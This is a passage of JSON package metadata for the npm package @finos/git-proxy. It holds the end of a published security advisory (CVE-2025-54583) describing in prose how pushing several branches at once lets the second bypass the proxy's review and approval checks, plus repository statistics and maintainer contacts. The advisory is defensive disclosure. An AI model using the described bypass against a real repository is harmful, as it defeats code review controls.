A simpler solution, and the one the fix adopts, is to reject multi-branch pushes outright.\n\n#### Actual Result\nBoth branches get pushed to the remote, and the second branch bypasses the proxy's policy checks and approval workflow entirely.\n\n### Impact\nAttackers with push access can bypass review policies, potentially inserting unwanted/malicious code into a GitProxy-protected repository.\n\nThe vulnerability impacts all users or organizations relying on GitProxy to enforce policies and prevent unapproved changes. It requires no elevated privileges beyond regular push access, and no extra user interaction. It does, however, require a GitProxy administrator or designated user (`canUserApproveRejectPush`) to approve the first push. It is much more likely that a well-meaning user would trigger this accidentally.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2025-07-30T16:34:50.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.3,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N","references":["https://github.com/finos/git-proxy/security/advisories/GHSA-qr93-8wwf-22g4","https://github.com/finos/git-proxy/commit/a620a2f33c39c78e01783a274580bf822af3cc3a","https://github.com/finos/git-proxy/commit/bd2ecb2099cba21bca3941ee4d655d2eb887b3a9","https://github.com/finos/git-proxy/releases/tag/v1.19.2","https://nvd.nist.gov/vuln/detail/CVE-2025-54583","https://github.com/advisories/GHSA-qr93-8wwf-22g4"],"source_kind":"github","identifiers":["GHSA-qr93-8wwf-22g4","CVE-2025-54583"],"repository_url":"https://github.com/finos/git-proxy","blast_radius":0.0,"created_at":"2025-07-30T17:09:12.391Z","updated_at":"2026-04-18T05:02:22.182Z","epss_percentage":0.00059,"epss_percentile":0.18555,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1xcjkzLTh3d2YtMjJnNM4ABKqN","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1xcjkzLTh3d2YtMjJnNM4ABKqN","packages":[{"ecosystem":"npm","package_name":"@finos/git-proxy","versions":[{"first_patched_version":"1.19.2","vulnerable
_version_range":"\u003c= 1.19.1"}],"purl":"pkg:npm/%40finos%2Fgit-proxy"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1xcjkzLTh3d2YtMjJnNM4ABKqN/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@finos/git-proxy","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@finos/git-proxy","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@finos/git-proxy/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-15T10:02:29.989Z","issues_count":195,"pull_requests_count":1023,"avg_time_to_close_issue":15027298.333333334,"avg_time_to_close_pull_request":939538.0789793439,"issues_closed_count":87,"pull_requests_closed_count":823,"pull_request_authors_count":52,"issue_authors_count":40,"avg_comments_per_issue":1.6307692307692307,"avg_comments_per_pull_request":2.8426197458455524,"merged_pull_requests_count":715,"bot_issues_count":5,"bot_pull_requests_count":592,"past_year_issues_count":76,"past_year_pull_requests_count":266,"past_year_avg_time_to_close_issue":2560840.9583333335,"past_year_avg_time_to_close_pull_request":687520.6457142857,"past_year_issues_closed_count":24,"past_year_pull_requests_closed_count":175,"past_year_pull_request_authors_count":13,"past_year_issue_authors_count":13,"past_year_avg_comments_per_issue":0.8289473684210527,"past_year_avg_comments_per_pull_request":2.9962406015037595,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":91,"past_year_merged_pull_requests_count":163,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/finos%2Fgit-proxy/issues","maintainers":[{"login":"JamieSlome","count":165,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JamieSlome"},{"login":"maoo","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/maoo"},{"login":"grovesy","count":9,"
url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/grovesy"},{"login":"TheJuanAndOnly99","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheJuanAndOnly99"},{"login":"robmoffat","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/robmoffat"},{"login":"coopernetes","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/coopernetes"},{"login":"mcleo-d","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mcleo-d"},{"login":"BrunoBerisso","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BrunoBerisso"},{"login":"finos-admin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/finos-admin"}],"active_maintainers":[{"login":"JamieSlome","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JamieSlome"},{"login":"TheJuanAndOnly99","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheJuanAndOnly99"},{"login":"coopernetes","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/coopernetes"},{"login":"mcleo-d","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mcleo-d"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@finos%2Fgit-proxy/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@finos%2Fgit-proxy/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@finos%2Fgit-proxy/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@finos%2Fgit-proxy/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@finos%2Fgit-proxy/codemeta","maintainers":[{"uuid":"texodus","login":"texodus","name":null,"email":"steinlink@gmail.com","url":null,"packages_count":142,"html_url":"https://www.npmjs.com/~texodus","role":null,"created_at":"2023-06-28T05
:57:54.110Z","updated_at":"2023-06-28T05:57:54.110Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/texodus/packages"},{"uuid":"finos-admin","login":"finos-admin","name":null,"email":"infra@finos.org","url":null,"packages_count":123,"html_url":"https://www.npmjs.com/~finos-admin","role":null,"created_at":"2023-06-28T05:57:53.263Z","updated_at":"2023-06-28T05:57:53.263Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/finos-admin/packages"},{"uuid":"maoo","login":"maoo","name":null,"email":"maurizio@session.it","url":null,"packages_count":124,"html_url":"https://www.npmjs.com/~maoo","role":null,"created_at":"2023-06-28T05:57:53.608Z","updated_at":"2023-06-28T05:57:53.608Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/maoo/packages"},{"uuid":"neil.slinger","login":"neil.slinger","name":null,"email":"neil.slinger@gmail.com","url":null,"packages_count":123,"html_url":"https://www.npmjs.com/~neil.slinger","role":null,"created_at":"2023-06-28T05:57:55.012Z","updated_at":"2023-06-28T05:57:55.012Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/neil.slinger/packages"}]}